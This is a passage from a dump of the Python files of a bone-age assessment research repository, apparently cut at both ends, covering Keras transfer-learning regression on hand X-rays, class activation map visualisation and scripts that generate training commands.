including MAE, MSE and other metrics.\n\nCode Usage for paced transfer learning.\n1. run paced_transfer/step1_ptl_gen.py to train BAA model with PTL\n2. run paced_transfer/step2_conventional_transfer.py to train BAA model without PTL\n3. run paced_transfer/step5_cam_inference.py to generate CAM results\n4. run paced_transfer/step6_visualize.py to generate training loss figures" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 16, "blob_id": "78e8ad745542d0040d88d4496ba782640bff4a63", "content_id": "3f46a00bd91e77b394319886920c0d46d20e84a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/paced_transfer/step3_plot.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\nfrom utils_data import load_obj\n" }, { "alpha_fraction": 0.6063756346702576, "alphanum_fraction": 0.6275121569633484, "avg_line_length": 39.64788818359375, "blob_id": "4136241a0310b50e48498da6833246558aeabfad", "content_id": "2e474fcd30fd370071e4e5a33f87682e4548d8cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5772, "license_type": "no_license", "max_line_length": 120, "num_lines": 142, "path": "/al_segmentation/step6_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import cv2\nimport argparse\nimport numpy as np\nimport os\nimport time\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.resnet50 import preprocess_input as resnet_50_input\n\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.vgg16 import preprocess_input as vgg16_input\n\nfrom keras.applications.vgg19 import VGG19\nfrom keras.applications.vgg19 import preprocess_input as vgg19_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom utils_data import load_obj\nfrom step4_regression_with_cam import _build_regresser, load_sample_data\n\nfrom tqdm import tqdm\n\n\n########################################CAM#############################################################################\ndef predict_on_weights(out_base, weights):\n gap = np.average(out_base, axis=(0, 1))\n logit = np.dot(gap, np.squeeze(weights))\n return 1 / (1 + np.e ** (-logit))\n\n\ndef getCAM(image, feature_maps, weights, plot_name=\"\"):\n predict = predict_on_weights(feature_maps, weights)\n\n # Weighted Feature Map\n cam = (predict - 0.5) * np.matmul(feature_maps, weights)\n # Normalize\n cam = (cam - cam.min()) / (cam.max() - cam.min())\n # Resize as image size\n cam_resize = cv2.resize(cam, (image.shape[0], image.shape[1]))\n # Format as CV_8UC1 (as applyColorMap required)\n cam_resize = 255 * cam_resize\n cam_resize = cam_resize.astype(np.uint8)\n # Get Heatmap\n heatmap = cv2.applyColorMap(cam_resize, cv2.COLORMAP_JET)\n # Zero out\n heatmap[np.where(cam_resize <= 100)] = 0\n\n image = (image+128)\n out = cv2.addWeighted(src1=image, alpha=0.8, src2=heatmap, beta=0.4, gamma=0)\n out = cv2.resize(out, dsize=(400, 400))\n\n if plot_name != \"\":\n cv2.imwrite(plot_name, out)\n return out\n\n\ndef batch_CAM(weights, data, base_model, original_int_images):\n idx = 0\n data_count = data.shape[0]\n result = None\n for j in range(int(np.sqrt(data_count))):\n for i in range(int(np.sqrt(data_count))):\n # src = data[idx][:, :, ::-1]\n src = data[idx]\n out_base = base_model.predict(np.expand_dims(src, axis=0))\n out_base = out_base[0]\n ori = original_int_images[idx]\n out = getCAM(image=ori, feature_maps=out_base, weights=weights)\n out = cv2.resize(out, dsize=(300, 300))\n if i > 0:\n canvas = np.concatenate((canvas, out), axis=1)\n else:\n canvas = out\n idx += 1\n if j > 0:\n result = np.concatenate((result, canvas), axis=0)\n else:\n result = canvas\n return result\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=32)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"false\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--num_gpu', type=int, default=1)\n FLAGS = parser.parse_args()\n\n num_gpu = FLAGS.num_gpu\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n cam_out_dir = \"E{}_M{}_S{}_A{}_F{}/cam\".format(exp_name, model_name, sex, augment_data, fine_tune)\n\n if not os.path.isdir(cam_out_dir):\n os.makedirs(cam_out_dir)\n\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n print \"[x] load saved model file\"\n weights_history = load_obj(model_out_dir + \"/weights_history.pkl\")\n model, input_shape, base_model = _build_regresser(model_name, weights=\"imagenet\", num_gpu=1, fine_tune=fine_tune)\n base_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\n\n sampled_x, sampled_y, sampled_original_int_images = load_sample_data(sex=sex,\n img_size=input_shape[0],\n preprocess_fn=preprocess_fn)\n\n file_name = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime(time.time())) + \".mp4\"\n print \"[x] saving file to {}/{}\".format(cam_out_dir, file_name)\n file_path = \"{}/{}\".format(cam_out_dir, file_name)\n\n fourcc = cv2.VideoWriter_fourcc(*'MP4V')\n out = cv2.VideoWriter(file_path, fourcc, 20.0, (1200, 1200))\n for weight in tqdm(weights_history):\n img = batch_CAM(weight, sampled_x, base_model, sampled_original_int_images)\n out.write(img)\n out.release()\n cv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.44245049357414246, "alphanum_fraction": 0.4560643434524536, "avg_line_length": 27.875, "blob_id": "bd2c4b807b59fbf46820a1e9141a61fbf459da19", "content_id": "2b1a7468e67d48902ea158c75c4904585a9e40ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1616, "license_type": "no_license", "max_line_length": 123, "num_lines": 56, "path": "/paced_transfer/sh_generator.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from config import *\n\ntemplete = \"python step1_paced_transfer_learning.py \" \\\n \"--exp=regression \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={}\"\n\ntemplete2 = \"python step1_ptl_multithread.py \" \\\n \"--exp=RM \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--data_thread_num={}\"\n\ntemplete_ptl = \"python step1_ptl_gen.py \" \\\n \"--exp={} \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--n_epoch={} \"\n\n\ntemplete_ctl = \"python step2_conventional_transfer.py \" \\\n \"--exp={} \" \\\n \"--img_size={} \" \\\n \"--gpu_id={} \" \\\n \"--sex={} \" \\\n \"--batch_size={} \" \\\n \"--start_layer={} \" \\\n \"--n_epoch={} \"\n\nimg_sizes = [299]\nbatch_size = 32\nsexs = [\"0\", \"1\", \"2\"]\nstart_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n\ngpu_id = 7\nn_epoch = 50\nfor sex in sexs:\n for img_size in img_sizes:\n for start_layer in start_layers:\n print templete_ptl.format(\"PTL\", img_size, gpu_id, sex, batch_size, start_layer, n_epoch)\n\ngpu_id = 6\nn_epoch = 250\nfor sex in sexs:\n for img_size in img_sizes:\n for start_layer in start_layers:\n print templete_ctl.format(\"CTL{}\".format(start_layer), img_size, gpu_id, sex, batch_size, start_layer, n_epoch)" }, { "alpha_fraction": 0.7386130690574646, "alphanum_fraction": 0.7484612464904785, "avg_line_length": 35.92424392700195, "blob_id": "c9dcdd6e6680844533ae26255691185d7431b28b", "content_id": "4d3efb11088ba262eec9830914a8f852deee9cf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2437, "license_type": "no_license", "max_line_length": 93, "num_lines": 66, "path": "/paced_transfer/step5_cam_inference.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport cv2\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.models import Model\nfrom keras import optimizers\nfrom keras.layers import GlobalAveragePooling2D, Dense\nfrom tqdm import tqdm\nimport keras\n\nfrom utils_data import load_sex_ids, load_obj, load_data_sex\nfrom config import *\nfrom step4_cam import inference\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"CAM\")\nparser.add_argument('--img_size', type=int, help=\"image size\", default=128)\nparser.add_argument('--gpu_id', type=int, default=0)\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\nparser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\nparser.add_argument('--start_layer', type=int, help=\"start_layer\", default=-1)\nFLAGS = parser.parse_args()\n\nexp_name = FLAGS.exp\ngpu_id = FLAGS.gpu_id\nimg_size = FLAGS.img_size\nbatch_size = FLAGS.batch_size\nsex = FLAGS.sex\nstart_layer = FLAGS.start_layer\n\n\nmodel_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\ninference_out_dir = \"E{}_S{}_IMG_{}/cam\".format(exp_name, sex, img_size)\n\ninput_shape = (img_size, img_size, 3)\nbase_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\nbase_model.load_weights(filepath=model_out_dir + \"/base_model.h5\")\npredictions = Dense(1, activation=keras.activations.relu)(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\nmodel.load_weights(model_out_dir+\"/model.h5\")\noptimizer = optimizers.RMSprop(lr=5E-4, decay=0.95)\nmodel.compile(optimizer=optimizer, loss='mean_absolute_error')\n\n\nprint \"[x] building models on GPU {}\".format(gpu_id)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nset_session(tf.Session(config=config))\n\nprint \"load model and data\"\ndata_ids = load_sex_ids(sex)\ndata_x, data_y = load_data_sex(sex, img_size, xception_input)\nweights_history = load_obj(model_out_dir+\"/weights.pkl\")\n\nprint \"inference\"\ninference(data_ids, data_y, base_model, weights_history, img_size)\n" }, { "alpha_fraction": 0.561430811882019, "alphanum_fraction": 0.5894245505332947, "avg_line_length": 28.272727966308594, "blob_id": "79ee9bc66fc255e78d51923acba4625ae4a77596", "content_id": "4064aa6a2a916f44cfb1d01ea894990fda133ab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 149, "num_lines": 22, "path": "/al_segmentation/sh_generator.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from config import *\n\ntemplete = \"python step4_regression_multi_gpu.py --exp=regression3 --batch_size={} --model_name={} --sex={} --augment={} --fine_tune={} --num_gpu={}\"\n\n\nnum_gpu = 5\nbatch_size = 32\nmodel_names = [\"inception_v3\", \"inception_resnet_v2\", \"xception\"]\nsexs = [\"0\", \"1\", \"2\"]\n# fine_tunes = [\"0\", \"1\", \"2\", \"3\"]\nfine_tunes = [\"0\", \"3\"]\naugments = [\"true\"]\n\ncount = 0\nfor model_name in model_names:\n for sex in sexs:\n for augment in augments:\n for fine_tune in fine_tunes:\n count += 1\n print templete.format(batch_size, model_name, sex, augment, fine_tune, num_gpu)\n\nprint count" }, { "alpha_fraction": 0.5204567313194275, "alphanum_fraction": 0.5305423140525818, "avg_line_length": 47.21100997924805, "blob_id": "aa2ec271b715dfe2de2c11a51eea198f6ba879cc", "content_id": "fa7ab93598f8c106695d3853b01785fa5f110948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5255, "license_type": "no_license", "max_line_length": 145, "num_lines": 109, "path": "/vallina_transfer_learning/utils_data_gen.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\nfrom config import *\n\n\ndef _build_img_generator(model_name=\"inception_v3\"):\n from keras.preprocessing.image import ImageDataGenerator\n if model_name == \"inception_v3\":\n from keras.applications.inception_v3 import preprocess_input\n elif model_name == \"inception_resnet_v2\":\n from keras.applications.inception_resnet_v2 import preprocess_input\n elif model_name == \"xception\":\n from keras.applications.xception import preprocess_input\n else:\n raise ValueError(\"Not support {}\".format(model_name))\n\n core_idg = ImageDataGenerator(samplewise_center=False,\n samplewise_std_normalization=False,\n horizontal_flip=True,\n vertical_flip=False,\n height_shift_range=0.2,\n width_shift_range=0.2,\n rotation_range=5,\n shear_range=0.01,\n fill_mode='nearest',\n zoom_range=0.25,\n preprocessing_function=preprocess_input)\n\n return core_idg\n\n\ndef _flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n df_gen = img_data_gen.flow_from_directory(base_dir, class_mode='sparse', **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\n\n\ndef _load_data(sex=0, img_path=RSNA_TRAIN_DATA, num_sample_per_category=500):\n if sex == 0:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n elif sex == 1:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n dataset_df = dataset_df[dataset_df.male==True]\n else:\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n dataset_df = dataset_df[dataset_df.male==False]\n\n dataset_df['path'] = dataset_df['id'].map(lambda x: os.path.join(img_path ,'{}.png'.format(x)))\n dataset_df['exists'] = dataset_df['path'].map(os.path.exists)\n print(dataset_df['exists'].sum(), 'images found of', dataset_df.shape[0], 'total')\n\n boneage_mean = dataset_df['boneage'].mean()\n boneage_std = 2*dataset_df['boneage'].std()\n\n print \"dataset mean: {}, dataset std: {}\".format(boneage_mean, boneage_std)\n dataset_df['boneage_zscore'] = dataset_df['boneage'].map(lambda x: (x-boneage_mean)/boneage_std)\n dataset_df.dropna(inplace=True)\n dataset_df['boneage_category'] = pd.cut(dataset_df['boneage'], 20)\n\n train_df, validation_df = train_test_split(dataset_df, test_size=0.25, random_state=2018, stratify=dataset_df['boneage_category'])\n new_train_df = train_df.groupby(['boneage_category']).apply(lambda x: x.sample(num_sample_per_category, replace=True)).reset_index(drop=True)\n print \"new data size : {}, old data size: {}\".format(new_train_df.shape[0], train_df.shape[0])\n\n return train_df, validation_df, boneage_mean, boneage_std\n\n\ndef build_data_generator(model_name=\"inception_v3\",\n sex=0,\n img_path=RSNA_TRAIN_DATA,\n num_per_category=500,\n img_size=512,\n batch_size=32):\n img_generator = _build_img_generator(model_name)\n img_sizes = (img_size, img_size)\n train_data_df, validation_data_df, mean, std = _load_data(sex=sex,\n img_path=img_path,\n num_sample_per_category=num_per_category)\n train_gen = _flow_from_dataframe(img_generator, train_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=batch_size)\n\n valid_gen = _flow_from_dataframe(img_generator, validation_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=batch_size) # we can use much larger batches for evaluation\n test_X, test_Y = next(_flow_from_dataframe(img_generator,\n validation_data_df,\n path_col='path',\n y_col='boneage_zscore',\n target_size=img_sizes,\n color_mode='rgb',\n batch_size=1000)) # one big batch\n return train_gen, valid_gen, mean, std, test_X, test_Y\n" }, { "alpha_fraction": 0.598504364490509, "alphanum_fraction": 0.6111289858818054, "avg_line_length": 38.479366302490234, "blob_id": "24f354d640005464aff6940334df6f26c986e797", "content_id": "237507a3030e7f9fdf6378111bad6bf5aab58662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12436, "license_type": "no_license", "max_line_length": 126, "num_lines": 315, "path": "/al_segmentation/step4_regression_with_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport argparse\nimport os\nimport pprint\nimport pickle\nimport keras\nimport sys\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\n\nfrom step4_regression_multi_gpu import load_data\nfrom config import *\nfrom utils_data import save_obj, load_obj\n\n\ndef regression_metric(y_true, y_pred):\n # explained_variance_score\n evs = explained_variance_score(y_true, y_pred)\n # mean_absolute_error\n mae = mean_absolute_error(y_true, y_pred)\n # mean_squared_error\n mse = mean_squared_error(y_true, y_pred)\n # median_absolute_error\n meae = median_absolute_error(y_true, y_pred)\n # r^2_score\n r2s = r2_score(y_true, y_pred)\n ccc = _ccc(y_true, y_pred)\n return evs, mae, mse, meae, r2s, ccc\n\n\ndef _ccc(y_true, y_pred):\n x_mean = np.average(y_true)\n y_mean = np.average(y_pred)\n n = y_true.shape[0]\n s_xy = np.sum(np.multiply(y_true-x_mean, y_pred-y_mean)) / n\n s_x2 = np.sum([np.power(e, 2) for e in (y_true - x_mean)]) / n\n s_y2 = np.sum([np.power(e, 2) for e in (y_pred - y_mean)]) / n\n return 2*s_xy / (s_x2+s_y2+np.power(x_mean-y_mean, 2))\n\n\ndef load_sample_data(data_ids=None, sex=0, img_size=256, preprocess_fn=xception_input, sample_count=16):\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all\"\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n if sex == 0:\n boneages = dataset_df.boneage\n ids = dataset_df.id\n elif sex == 1:\n boneages = dataset_df[dataset_df.male == True].boneage\n ids = dataset_df[dataset_df.male == True].id\n elif sex == 2:\n boneages = dataset_df[dataset_df.male == False].boneage\n ids = dataset_df[dataset_df.male == False].id\n\n bas_l = []\n ids_l = []\n\n n_data = len(ids)\n for i in range(len(ids)):\n boneage = boneages.ix[boneages.index[i]]\n ids_l.append(ids.ix[ids.index[i]])\n bas_l.append(boneage)\n\n if data_ids == None:\n # random sample 16 data\n selected_indexes = np.random.permutation(range(n_data))[:sample_count]\n selected_ids = []\n for i in range(len(ids)):\n if i in selected_indexes:\n selected_ids.append(ids_l[i])\n else:\n selected_ids = data_ids\n\n x = []\n original_int_images = []\n y = []\n for i in tqdm(range(n_data)):\n id = ids_l[i]\n if id in selected_ids:\n boneage = bas_l[i]\n img_file_name = data_dir + \"/{}_seg.png\".format(id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n original_int_images.append(np.array(ori_img, dtype=np.uint8))\n img = np.array(img, dtype=np.float32)\n img = preprocess_fn(img)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n x.append(img)\n y.append(boneage)\n\n x = np.array(x, dtype=np.float32)\n y = np.array(y, dtype=np.float32)\n y = y / SCALE\n print \"[x] load %d data\" % x.shape[0]\n return x, y, original_int_images\n\n\n\n\ndef _build_regresser(model_name, weights, num_gpu, fine_tune):\n input_shape = (299, 299, 3)\n if model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=input_shape, weights=weights, include_top=False)\n elif model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=input_shape, weights=weights, include_top=False)\n elif model_name == \"xception\":\n base_model = Xception(input_shape=input_shape, weights=weights, include_top=False)\n else:\n raise ValueError(\"NOT A SUPPORT MODEL\")\n\n if model_name == \"inception_v3\":\n if fine_tune == INCEPTION_V3_INCEPTION_3:\n start = INCEPTION_V3_INCEPTION_3_START\n elif fine_tune == INCEPTION_V3_INCEPTION_4:\n start = INCEPTION_V3_INCEPTION_4_START\n elif fine_tune == INCEPTION_V3_INCEPTION_5:\n start = INCEPTION_V3_INCEPTION_5_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n elif model_name == \"inception_resnet_v2\":\n if fine_tune == INCEPTION_RESNET_V2_INCEPTION_A:\n start = INCEPTION_RESNET_V2_INCEPTION_A_START\n elif fine_tune == INCEPTION_RESNET_V2_INCEPTION_B:\n start = INCEPTION_RESNET_V2_INCEPTION_B_START\n elif fine_tune == INCEPTION_RESNET_V2_INCEPTION_C:\n start = INCEPTION_RESNET_V2_INCEPTION_C_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n elif model_name == \"xception\":\n if fine_tune == XCEPTION_ENTRY:\n start = XCEPTION_ENTRY_START\n elif fine_tune == XCEPTION_MID:\n start = XCEPTION_MID_START\n elif fine_tune == XCEPTION_EXIT:\n start = XCEPTION_EXIT_START\n elif fine_tune == FINE_TUNE_ALL:\n start = -1\n else:\n raise ValueError(\"NOT A SUPPORT MODEL\")\n\n for i, layer in enumerate(base_model.layers):\n if i < start:\n layer.trainable = False\n else:\n layer.trainable = True\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n print predictions.get_shape()\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=5E-4, decay=0.95)\n if num_gpu > 1:\n model = multi_gpu_model(model, num_gpu)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n model.compile(optimizer=optimizer, loss='mean_absolute_error')\n\n return model, input_shape, base_model\n\n\ndef _batch_cvt(batch_data):\n imgs = []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n\n\ndef train(model_name,\n weights=\"imagenet\",\n n_epoch=N_TRAINING_EPOCH,\n sex=0,\n batch_size=16,\n augment=False,\n num_gpu=1,\n fine_tune=\"\"):\n model, input_shape, base_model = _build_regresser(model_name, weights, num_gpu, fine_tune)\n if model_name == \"inception_v3\":\n preprocess_fn = inception_v3_input\n elif model_name == \"inception_resnet_v2\":\n preprocess_fn = inception_resnet_input\n elif model_name == \"xception\":\n preprocess_fn = xception_input\n else:\n raise ValueError(\"Not a supported model name\")\n\n data_x, data_y = load_data(sex, input_shape[0], augment, preprocess_fn)\n print \"[x] total data size {} G\".format(sys.getsizeof(data_x)/1024**3)\n best_loss = np.inf\n weights_history = []\n for epoch in tqdm(range(n_epoch)):\n print \"========================================================================================================\"\n x_train, x_test, y_train, y_test = train_test_split(data_x, data_y, test_size=0.3, random_state=0, shuffle=True)\n for mini_batch in range(x_train.shape[0] // batch_size):\n batch_x = x_train[mini_batch * batch_size: (mini_batch + 1) * batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n batch_y = y_train[mini_batch * batch_size: (mini_batch + 1) * batch_size]\n loss = model.train_on_batch(x=batch_x_cvt, y=batch_y)\n if mini_batch % 100 == 0:\n print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n weights_history.append(model.layers[-1].get_weights()[0])\n\n # test\n print \"[x] test in epoch {}\".format(epoch)\n losses = 0.0\n for mini_batch in range(x_test.shape[0] // batch_size):\n batch_x = x_test[mini_batch * (batch_size): (mini_batch + 1) * batch_size]\n batch_y = y_test[mini_batch * (batch_size): (mini_batch + 1) * batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n loss = model.test_on_batch(batch_x_cvt, batch_y)\n losses += loss\n losses = losses/(x_test.shape[0] // batch_size)\n if losses < best_loss:\n best_loss = losses\n model.save_weights(model_out_dir + \"/epoch_{}.h5\".format(epoch))\n print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n # test and metric\n print \"[x] predict in epoch {}\".format(epoch)\n y_true = []\n y_pred = []\n for mini_batch in range(x_test.shape[0] // batch_size):\n batch_x = x_test[mini_batch*(batch_size): (mini_batch+1)*batch_size]\n batch_y = y_test[mini_batch*(batch_size): (mini_batch+1)*batch_size]\n batch_x_cvt = _batch_cvt(batch_x)\n pred_y = model.predict_on_batch(batch_x_cvt)\n for i in range(batch_size):\n y_true.append(batch_y[i]*SCALE)\n y_pred.append(pred_y[i]*SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs,\n \"mae\": mae,\n \"mse\": mse,\n \"meae\": meae,\n \"r2s\": r2s,\n \"ccc\": ccc,\n \"loss\": losses},\n name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n print \"[x] epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n return weights_history, base_model, input_shape[0], preprocess_fn\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=128)\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"xception\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"cam\")\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--augment', type=str, help=\"augment data\", default=\"true\")\n parser.add_argument('--fine_tune', type=str, help=\"fine tune pretrained layer\", default=\"3\")\n parser.add_argument('--gpu_id', type=int, default=0)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n num_gpu = 1\n gpu_id = FLAGS.gpu_id\n\n print \"[x] building models on GPU: {}\".format(gpu_id)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n batch_size = FLAGS.batch_size * num_gpu\n model_name = FLAGS.model_name\n exp_name = FLAGS.exp\n sex = FLAGS.sex\n augment_data = True if FLAGS.augment == \"true\" else False\n fine_tune = FLAGS.fine_tune\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(exp_name, model_name, sex, augment_data, fine_tune)\n model_out_dir = \"E{}_M{}_S{}_A{}_F{}/model\".format(exp_name, model_name, sex, augment_data, fine_tune)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n weights_history, base_model, img_size, pre_fn = \\\n train(model_name=model_name, weights=\"imagenet\", n_epoch=N_TRAINING_EPOCH, sex=sex,\n batch_size=batch_size, augment=augment_data, num_gpu=num_gpu, fine_tune=fine_tune)\n\n # save weight and base model\n save_obj(weights_history, name=model_out_dir + \"/weights_history.pkl\")\n base_model.save_weights(filepath=model_out_dir + \"/base_model.h5\")\n" }, { "alpha_fraction": 0.6392620205879211, "alphanum_fraction": 0.6556077003479004, "avg_line_length": 31.87234115600586, "blob_id": "9afe94ff8fd71bdba511860e20060f23dfa15f32", "content_id": "c8a20f5ab2570c98682969e99d5e7c97d74a6ec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6179, "license_type": "no_license", "max_line_length": 126, "num_lines": 188, "path": "/vallina_transfer_learning/utils.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\nimport pickle\nimport h5py\nimport keras\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import 